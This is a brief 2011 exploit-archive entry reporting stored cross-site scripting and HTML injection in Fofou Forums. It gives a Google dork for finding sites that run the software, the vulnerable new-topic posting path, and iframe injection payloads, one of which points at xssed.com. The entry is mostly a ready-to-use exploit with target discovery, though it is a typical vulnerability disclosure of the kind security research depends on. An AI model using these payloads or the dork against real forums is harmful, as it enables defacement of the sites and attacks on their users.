Home / exploits Fofou Forums Cross Site Scripting
Posted on 16 August 2011
# Exploit Title: Permanent XSS and Html Code Injection in the Fofou Forums # Google Dork: intext:Powered by fofou # Date: 15.08.2011 # Author: Sony # Software Link: http://blog.kowalczyk.info/software/fofou/index.html # Version: all version .............................. ....................................................................... http://www.server/forum/post New Topic: (all fields) XSS: <iframe src="http://xssed.com"> Html Code Injection : <iframe width="425" height="349" src=" http://www.youtube.com/embed/8SaeEQWkVJ0" frameborder="0" allowfullscreen></iframe>
